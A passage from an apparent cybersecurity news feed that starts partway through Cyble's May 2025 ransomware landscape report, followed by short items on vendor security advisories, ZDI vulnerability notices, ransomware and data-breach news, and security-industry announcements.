wide range of industries, Healthcare and Education have been above the mean and Government, Finance and IT below (charts below). DevMan is an affiliate of several RaaS groups and has recently been observed expanding its operations beyond affiliate activity. The threat actor claimed 13 victims in May, placing it just behind the leading ransomware groups and making it one to watch. In a recent attack on media in Thailand, the group claimed that all systems and NAS devices were encrypted using their own customized encryptor, applying the “.devman1” file extension. DevMan claims the deployment used an upgraded version of their malware that’s capable of faster lateral movement, implemented via Group Policy Object (GPO). Sample screenshots published on DevMan's leak site showed apparent access to file shares, server management interfaces, domain controller settings, and encrypted directories. The group claimed to have stolen 170 GB of data and expressed willingness to sell the data to a single buyer. DevMan has previously worked with Qilin, Apos, and DragonForce RaaS, and recent claims add RansomHub to their multi-RaaS affiliations. VanHelsing Source Code Leak In another significant development in May, a known malware developer attempted to auction the VanHelsing Ransomware-as-a-Service (RaaS) source code on the RAMP forum, starting at $10,000. The package allegedly included the full codebase, admin web panel, chat interface, file server, blog platform, database, and TOR keys. Shortly after the auction attempt, the VanHelsing group themselves leaked the full source code for free on RAMP and denounced the malware developer as a scammer. The group said VanHelsing RaaS v2.0 is in development and will be released soon. The internal fallout and code leak raise concerns of potential copycat operations, as observed following the leaks of LockBit and Babuk. The widespread availability of VanHelsing’s source code may accelerate the emergence of new ransomware variants in the coming weeks. New Ransomware Groups Among new ransomware groups that emerged in May, “Dire Wolf” launched an onion-based data leak site (DLS), listing six victim organizations, primarily across Asia, Australia, and Italy. Dire Wolf posted a file tree, sample files, and descriptions of the allegedly stolen data for each organization. A new ransomware group named DATACARRY was observed actively targeting European companies through a newly established onion-based data leak site. The group has listed seven victims from diverse sectors and countries, leaking parts of allegedly stolen data. The group communicates with victims via Session messenger and has circulated a ransom note, though no locker has been yet observed. A newly emerged ransomware group calling itself "J" has launched an onion DLS, following earlier signs of activity observed in March 2025. In its initial disclosure, J listed multiple organizations across South America, Australia, Europe, the U.S., and Asia. The group has shared file trees of allegedly compromised data from victim organizations in support of their claims. Notable Ransomware Attacks Here are some of the notable ransomware attacks that occurred in May, sourced from Cyble dark web researchers and OSINT sources. Several of the claimed attacks are noteworthy for their potential impact on the software supply chain and critical infrastructure. Many of the attack claims were unconfirmed by victim organizations, hence Cyble’s characterization of the alleged attacks as claims. The UK was hit by high-profile retail cyberattacks in late April and early May, with possible connections to Scattered Spider and DragonForce ransomware. The Silent ransomware group claimed to have compromised a U.S.-based network security company. The group alleges it exfiltrated 764 GB of data across 186,955 files and posted several samples appearing to show access to internal configuration files, encrypted data blocks, system logs, and administrative commands, but responses from the company appear to dispute the significance of the data. The Qilin ransomware group claimed responsibility for compromising a U.S. satellite communications (SATCOM) and cybersecurity solutions provider to defense, government, aerospace, and critical infrastructure clients. File samples suggest that the allegedly stolen data appears to span multiple years and includes both personal identity information and operational business files. Qilin also claimed responsibility for an attack on a Japanese shipbuilder, potentially exposing data not just related to merchant ship construction but also related to the Japanese Coast Guard/Navy. The Termite ransomware group claimed to exfiltrate over 550 GB data containing 700,000 files from a French technology company and supplier in the French aerospace and defense ecosystem. Play ransomware claimed to compromise a U.S. emergency communication and early warning systems provider to government, military and critical infrastructure. The Akira ransomware group claimed responsibility for a cyberattack on a U.S.-based energy trading subsidiary of a Japanese corporation. The Lynx ransomware group claimed responsibility for a cyberattack on a Saudi Arabian architecture and engineering firm, while Qilin claimed responsibility for a cyberattack on a Singapore-based construction and engineering firm. The INC Ransom group claimed responsibility for an attack on a South African airline. The BERT ransomware group claimed to have compromised a Taiwanese manufacturer of automation equipment for the semiconductor, LED, and passive component industries. The company responded that there was no significant operational or data impact. The Medusa ransomware group claimed responsibility for compromising a U.S.-based technology solutions provider specializing in IT infrastructure, cloud services, cybersecurity, and systems integration for public sector and enterprise clients. The Akira ransomware group claimed a cyberattack on a Greece-based international shipping company specializing in the transportation of petroleum and chemical products. A U.S.-based developer of mathematical computing software confirmed that it had experienced a ransomware attack that led to outages in both customer-facing applications and internal platforms. The Arkana ransomware group claimed responsibility for an attack on a UK-based multinational mining company. The Qilin ransomware group claimed responsibility for a cyberattack targeting a U.S. contract pharmaceutical manufacturer. The Play ransomware group claimed to have compromised a U.S.-based provider of high-performance graphics, video capture, and signal processing solutions for the defense and aerospace industries. The Everest ransomware group claimed to have breached a UAE-based airline and a Saudi Arabian pharmaceutical company. Conclusion The resilience of ransomware actors and affiliates in the face of major upheaval among the leading groups underscores the ever-present threat of ransomware and highlights the enduring importance of cybersecurity best practices for protecting against a wide range of cyber threats. Consistent application of good security practices is critical for building organizational resilience and limiting the impact of any cyberattacks that do occur. Those basic defensive and cyber hygiene practices include prioritizing vulnerabilities based on risk, protecting web-facing assets, segmenting networks and critical assets, implementing ransomware-resistant backups and Zero Trust principles, proper configuration and secrets protection, hardened endpoints and infrastructure, and network, endpoint and cloud monitoring. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free threat assessment report for your organization. The post Ransomware Landscape May 2025: SafePay, DevMan Emerge as Major Threats appeared first on Cyble.

Calling cyber security professionals, culture specialists and leaders to drive uptake of new Cyber security culture principles.

Insider threats are dangerous because they exploit trust, access, and familiarity with systems—often going undetected for months. Real-time monitoring and deception tech provide the visibility and proof needed to detect them. Insider threats represent one of the most complex challenges in cybersecurity today, not because of volume, but because of subtlety. Unlike external attacks, insider […] The post Insider Threat Detection and Internal Network Security Monitoring with Deception appeared first on CounterCraft.

Abuse allows Meta and Yandex to attach persistent identifiers to detailed browsing histories.

Monumental Sports & Entertainment and Cisco unveiled a transformative new partnership between the two companies, to power MSE’s new arena in downtown Washington, D.C. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Monumental Sports & Entertainment and Cisco unveiled a transformative new partnership between the two companies, to power MSE’s new arena in downtown Washington, D.C. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Introducing the Akamai Partner Awards, which recognize excellence ? both organizational and individual ? in sales, services, marketing, and technical impact.

A recent Barracuda Networks survey found that 65% of IT and security professionals say their organizations are juggling too many security tools.

Završio je drugi Hackultet, CTF natjecanje iz kibernetičke sigurnosti za studente, a pobjedu je odnio tim Konsenzus s 9605 bodova. Tim je sastavljen od studenata Fakulteta elektrotehnike i računarstva, Tehničkog veleučilišta u Zagrebu i Sveučilišta Algebra Bernays. Na drugom Hackultetu sudjelovalo je 16 timova – 80 studenata. Zahvaljujemo svima na sudjelovanju i čestitamo na ostvarenim... The post Rezultati drugog Hackultet natjecanja first appeared on CERT.hr.

To stop the JINX-0132 gang behind these attacks, pay attention to HashiCorp, Docker, and Gitea security settings Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools.

At SAP Sapphire, SAP shared the latest innovations and highlighted the enormous momentum among customers and partners.

In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone.  This coverage is extremely valuable for the cybersecurity community as it raises...

With over $100 million raised to date and a 300% revenue surge since our last round, Zero Networks is proving that defenders don’t have to lose. Zero’s Series C milestone doesn’t just fund growth – it fuels a paradigm shift: welcome to the era of the defender.  For years, defenders have been saddled with a crushing disadvantage. Day in and day out, they’ve faced an ever-sprawling battlefield screaming with alerts and unpredictable, relentless risks. Lateral…

To perform at the highest level in professional gaming, Team Liquid is constantly thinking of new ways to gain more insights from its data.

Kaspersky expert shares insights on how to determine whether an attack was first launched in a container or on the host itself when an organization’s logs lack container visibility.

We discovered an Azure OpenAI misconfiguration allowing shared domains, potentially leading to data leaks. Microsoft quickly resolved the issue. The post Lost in Resolution: Azure OpenAI's DNS Resolution Issue appeared first on Unit 42.

Cynthia Kaiser will serve as senior vice president for Halcyon’s Ransomware Research Center.

Nothing terribly valuable taken in data heist, though privacy a little tarnished Global jewelry giant Cartier is writing to customers to confirm their data was exposed to cybercriminals that broke into its systems.

A growing number of malicious campaigns have leveraged a recently discovered Android banking trojan called Crocodilus to target users in Europe and South America. The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim's contacts list. "Recent...

Official Juniper Networks Blogs 8 gute Gründe für einen Umstieg auf ein Datencenter-Netzwerk von Juniper Datencenter-Netzwerke sind ein hochaktuelles Thema und Juniper bietet in vielerlei Hinsicht beispiellose Lösungen. Doch warum jetzt? Und warum Juniper? Zunächst einmal: Warum ist das Thema gerade so wichtig? Das liegt The post 8 gute Gründe für einen Umstieg auf ein Datencenter-Netzwerk von Juniper appeared first on Official Juniper Networks Blogs.

Security Advisory Description Improper input validation in UEFI firmware for some Intel(R) Processors may allow a privileged user to enable information disclosure or denial of service via local ...

Security Advisory Description Improper input validation in UEFI firmware error handler for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via ...

Introduction Junie is an intelligent coding agent developed by JetBrains. It automates the full development loop: reading project files, editing code, running tests, and applying fixes, going far beyond simple code generation. Similar to how developers use tools like ChatGPT to solve coding problems, Junie takes it a step further by automating the entire process. […]

Google has revealed that it will no longer trust digital certificates issued by Chunghwa Telecom and Netlock citing "patterns of concerning behavior observed over the past year." The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. The current major version is 137.  The update will affect all Transport Layer Security (TLS)...

Security Advisory Description Race condition in Seamless Firmware Updates for some Intel(R) reference platforms may allow a privileged user to potentially enable denial of service via local access.

Australia’s fintech sector is undergoing rapid evolution. With a booming A$45 billion fintech industry and a $10 trillion financial services market, the nation has become a global hub for digital finance innovation. However, this progress comes with heightened scrutiny and regulatory pressure. The Australian Prudential Regulation Authority (APRA) and the Australian Cyber Security Centre (ACSC) are urging organizations to implement strong cyber hygiene measures—especially the Essential 8—as a baseline for defending against cyber threats. Meeting these requirements can be daunting for fintechs and small-to-medium businesses (SMBs) due to high implementation costs and technical complexity. That’s where Cyble steps in. Cyble’s Essential 8 Support Package offers a quick and affordable path to compliance, enabling regulated entities to hone confidence while adopting Essential 8. Understanding APRA and the Essential 8 Founded in 1998, APRA is the primary regulator for Australia’s banking, insurance, and superannuation sectors. APRA emphasizes cyber resilience through the ACSC’s Essential Eight—a set of baseline mitigation strategies proven to prevent or limit the impact of cybersecurity incidents. The Essential 8 includes: Application patching Operating system patching Multi-factor authentication (MFA) Restricting administrative privileges Application control Restricting Microsoft Office macros User application hardening Regular backups Initially released in June 2017 and continuously updated based on threat intelligence and field experience, the Essential Eight Maturity Model supports organizations in tracking and improving their cyber defenses. According to KPMG’s Pulse of Fintech H2’24 report, although Australian fintech investment reached $1.1 billion in H2 2024—driven by a few large-scale acquisitions—early-stage startups continue to struggle, leaving many without the resources or infrastructure to implement enterprise-grade cybersecurity measures. Cyble’s Essential 8 Support Package: A Tailored Cybersecurity Solution Recognizing this gap, Cyble has launched a focused Essential 8 Support Package, designed explicitly for SMBs operating within APRA-regulated entities. These include: Authorized Deposit-Taking Institutions General Insurance Providers Life Insurance and Friendly Societies Private Health Insurers Superannuation Funds Cyble’s solution combines advanced threat intelligence, vulnerability scanning, and risk assessment to help organizations efficiently implement and maintain the Essential 8 controls. What’s Inside the Cyble Support Package? The Cyble support package is engineered for proactive defense and compliance monitoring. Here’s how it helps align with the Essential 8 requirements: In addition, Cyble's package includes: External Attack Surface Management (EASM) scans Digital Risk Monitoring for code leaks on platforms like GitHub, Pastebin, and Discord Continuous monitoring of open-source software (OSS) and third-party vulnerabilities Credential leak detection and threat actor chatter surveillance on deep and dark web forums Each feature is tied to specific SKUs—vulnerability Management, Attack Surface Management (ASM), Dark Web (DW), Data Leaks, Web Scan Apps, and Cloud Security Posture Management (CSPM)—ensuring granular visibility and accountability. Why Compliance Is Now Mission-Critical for Australia’s Fintech Sector Australia is home to some of the world’s most innovative financial technology companies, so the sector is no stranger to digital disruption. But innovation must be balanced with compliance—especially in a regulatory environment where changes in Buy Now Pay Later (BNPL) laws, AML/CTF frameworks, digital asset regulation, and privacy legislation are all tightening the screws. According to Chambers and Partners, Australia is entering a phase of regulatory maturity, where cybersecurity isn’t just a best practice—it’s a legal and operational necessity. Cyble’s Essential 8 support package ensures that fintech and SMBs aren’t left behind due to budget or capability constraints. Bridging Innovation and Compliance Australia’s fintech landscape thrives on innovation, but compliance with frameworks like the Essential 8 will sustain its long-term growth and security. Cyble offers an affordable, scalable, and technically driven solution to help organizations easily comply with APRA’s expectations. With Cyble’s support package, SMBs and fintech firms can move beyond checklist compliance and into the realm of continuous cyber resilience, without sacrificing innovation or incurring prohibitive costs. Contact Cyble today to learn how your organization can achieve Essential Eight compliance—securely, efficiently, and affordably. References: https://practiceguides.chambers.com/practice-guides/fintech-2025/australia/trends-and-developments https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight/essential-eight-maturity-model-ism-mapping https://international.austrade.gov.au/en/do-business-with-australia/sectors/technology/fintech#accordion-97decbd5c0-item-f2222844e8 https://kpmg.com/au/en/home/insights/2023/11/australian-fintech-survey-report-2023.html https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight https://www.cyber.gov.au/resources-business-and-government/essential-cybersecurity/essential-eight/essential-eight-explained https://kpmg.com/au/en/home/insights/2024/08/pulse-of-fintech.html The post APRA Compliance, Simplified by Cyble appeared first on Cyble.

Microsoft and CrowdStrike have announced that they are teaming up to align their individual threat actor taxonomies by publishing a new joint threat actor mapping. "By mapping where our knowledge of these actors align, we will provide security professionals with the ability to connect insights faster and make decisions with greater confidence," Vasu Jakkal, corporate vice president at Microsoft...

As the cyber threat landscape evolves and the digital landscape changes, regulatory frameworks continue to emerge, aiming to bolster the security posture of organisations, particularly in the financial sector. One such regulation is the Digital Operational Resilience Act (DORA), effective since January 2025, which sets stringent security requirements for financial entities operating within the European […] La publication suivante Navigating DORA: How Sekoia.io can support your compliance journey est un article de Sekoia.io Blog.

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-09-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Xavier DANEST - Decathlon' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-09-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Ho Xuan Ninh (@izx) + Tri Dang (Sea Security)' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Ho Xuan Ninh (@izx) + Tri Dang (Sea Security)' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Othman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N severity vulnerability discovered by 'Alfredo Oliveira of Trend Research' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-03, 3 days ago. The vendor is given until 2025-10-01 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5473.

This vulnerability allows local attackers to escalate privileges on affected installations of 2BrightSparks SyncBackFree. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is also required. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-5474.

This vulnerability allows local attackers to escalate privileges on affected installations of Action1. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5480.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante DICOM Viewer Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5481.

Consent is supposed to be simple. In its ideal form, it’s a clear, mutual agreement between two parties. But in today’s digital ecosystem, it’s become anything but.

Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition to the AnyConnect VPN service on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco Meraki has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-QTRHzG2 Security Impact Rating: High CVE: CVE-2024-20498,CVE-2024-20499,CVE-2024-20500,CVE-2024-20501,CVE-2024-20502,CVE-2024-20513

A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to hijack an AnyConnect VPN session or cause a denial of service (DoS) condition for individual users of the AnyConnect VPN service on an affected device. This vulnerability is due to weak entropy for handlers that are used during the VPN authentication process as well as a race condition that exists in the same process. An attacker could exploit this vulnerability by correctly guessing an authentication handler and then sending crafted HTTPS requests to an affected device. A successful exploit could allow the attacker to take over the AnyConnect VPN session from a target user or prevent the target user from establishing an AnyConnect VPN session with the affected device. Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-by-QWUkqV7X Security Impact Rating: Medium CVE: CVE-2024-20509

Google on Monday released out-of-band fixes to address three security issues in its Chrome browser, including one that it said has come under active exploitation in the wild. The high-severity flaw is being tracked as CVE-2025-5419 (CVSS score: 8.8), and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine. "Out-of-bounds read and...

Google released a security update to address multiple vulnerabilities in Google Chrome.

Google has released Android Security Bulletin June 2025 to fix multiple security vulnerabilities in Android operating system.

Multiple vulnerabilities were identified in Splunk products. A remote attacker could exploit some of these vulnerabilities to trigger cross-site scripting and elevation of privilege on the targeted system. Impact Cross-Site Scripting Elevation of Privilege System / Technologies affected Splunk Enterprise versions below 9.4.2, 9.3.4 and 9.2.6 Splunk Cloud Platform versions below 9.3.2411.102, 9.3.2408.111 and 9.2.2406.118 Splunk Universal Forwarder for Windows versions below 9.4.2, 9.3.4, 9.2.6, and 9.1.9 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://advisory.splunk.com//advisories/SVD-2025-0601 https://advisory.splunk.com//advisories/SVD-2025-0602

Multiple vulnerabilities were identified in Samsung Products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, security restriction bypass, sensitive information disclosure and data manipulation on the targeted system.   [Updated on 2025-06-04... Impact Denial of Service Elevation of Privilege Security Restriction Bypass Information Disclosure Data Manipulation System / Technologies affected Samsung mobile devices running Android 13, 14, 15 Exynos 980, 990, 1080, 1280, 1380, 1480, 2100, 2200, 2400 For affected products, please refer to the link below: https://security.samsungmobile.com/securityUpdate.smsb https://semiconductor.samsung.com/support/quality-support/product-security-updates/ Solutions Before installation of the software, please visit the vendor website for more details.   Apply fixes issued by the vendor: https://security.samsungmobile.com/securityUpdate.smsb https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-7881/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23095/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23096/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23097/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23098/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23099/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23100/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23101/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23102/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23103/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23104/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23105/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23106/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-23107/

Multiple vulnerabilities were identified in RedHat Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, security restriction bypass and sensitive information disclosure on the targeted system. Impact Denial of Service Elevation of Privilege Security Restriction Bypass Information Disclosure System / Technologies affected Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 Red Hat CodeReady Linux Builder for x86_64 10 x86_64 Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 Red Hat Enterprise Linux for ARM 64 10 aarch64 Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x Red Hat Enterprise Linux for IBM z Systems 10 s390x Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.8 ppc64le Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.4 ppc64le Red Hat Enterprise Linux for Power, little endian 10 ppc64le Red Hat Enterprise Linux for Power, little endian 8 ppc64le Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 8.8 x86_64 Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.4 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.2 x86_64 Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.4 x86_64 Red Hat Enterprise Linux for x86_64 10 x86_64 Red Hat Enterprise Linux for x86_64 8 x86_64 Red Hat Enterprise Linux Server - AUS 9.2 x86_64 Red Hat Enterprise Linux Server - AUS 9.4 x86_64 Red Hat Enterprise Linux Server - TUS 8.8 x86_64 Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.4 ppc64le Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://access.redhat.com/errata/RHSA-2025:8342 https://access.redhat.com/errata/RHSA-2025:8344 https://access.redhat.com/errata/RHSA-2025:8345 https://access.redhat.com/errata/RHSA-2025:8346 https://access.redhat.com/errata/RHSA-2025:8347 https://access.redhat.com/errata/RHSA-2025:8374 https://access.redhat.com/errata/RHSA-2025:8399

Multiple vulnerabilities were identified in Android. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system.   Impact Denial of Service Elevation of Privilege Information Disclosure System / Technologies affected Android security patch level prior to 2025-06-05 Solutions Before installation of the software, please visit the vendor web-site for more details. Apply fixes issued by the vendor: https://source.android.com/docs/security/bulletin/2025-06-01

Peter Lowe, FIRST’s DNS Abuse Policy Ambassador, shares a review of the APAC DNS Forum in Hanoi, Vietnam, where he met with representatives from various organizations and had valuable discussions about DNS abuse and data sharing.

Peter Lowe, FIRST’s DNS Abuse Policy Ambassador, shares a review of the APAC DNS Forum in Hanoi, Vietnam, where he met with representatives from various organizations and had valuable discussions about DNS abuse and data sharing.

De multiples vulnérabilités ont été découvertes dans les produits Splunk. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une injection de code indirecte à distance (XSS) et un contournement de la politique de sécurité.

De multiples vulnérabilités ont été découvertes dans Google Chrome. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur. Google indique que la vulnérabilité CVE-2025-5419 est activement exploitée.

De multiples vulnérabilités ont été découvertes dans les produits Google. Elles permettent à un attaquant de provoquer une élévation de privilèges, un déni de service à distance et une atteinte à la confidentialité des données.

Security Advisory Description The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such ...

Edge computing and stricter regulations could usher in a new era of AI privacy.

We compare the effectiveness of content filtering guardrails across major GenAI platforms and identify common failure cases across different systems. The post How Good Are the LLM Guardrails on the Market? A Comparative Study on the Effectiveness of LLM Content Filtering Across Major GenAI Platforms appeared first on Unit 42.

Broadcom claims many eliminated partners weren't doing any VMware business.

This information-sharing hub provided essential information to the emergency services sector on physical and cyber threats. Some say the timing is concerning.

New details on the Cisco IOS XE vulnerability could help attackers develop a working exploit soon, researchers say.

The agency’s national labs can offer high performance computing capabilities for artificial intelligence innovation, several leaders noted, but it requires an expedited negotiation process.

S Ventures invests in the next era of computing through our partnership with Infleqtion, a pioneering leader securing against quantum threats.

The request would support an estimated 150 full time employees, 80% of whom would be paid out of agency reimbursements, rather than DOGE-specific funds.

A real-world Trojan Horse attack Ukraine claims it launched a cunning drone strike on Sunday against multiple Russian airbases, hitting over 40 military aircraft and inflicting an estimated $7 billion in damage, in an operation dubbed "Spiderweb."

HPE security advisory (AV25-310)

An anonymous whistleblower has leaked large amounts of data tied to the alleged operator behind Trickbot and Conti ransomware.

Melinda Rogers said May 30 was her last day with the Department of Justice.

On June 1, 2025, Roundcube published security advisories to address vulnerabilities.

Spyware maker NSO Group asked a federal judge to reduce the damages it owes to WhatsApp in a case involving 1,400 infected phones, or set up a new trial.

Security Advisory Description An integer overflow can be triggered in SQLite’s `concat_ws()` function. The resulting, truncated integer is then used to allocate a buffer. When SQLite then writes ...

The bipartisan House AI Task Force’s recommendations provide “a great running start” for Congress to establish guardrails around the safe use of emerging technologies, the lawmaker said.

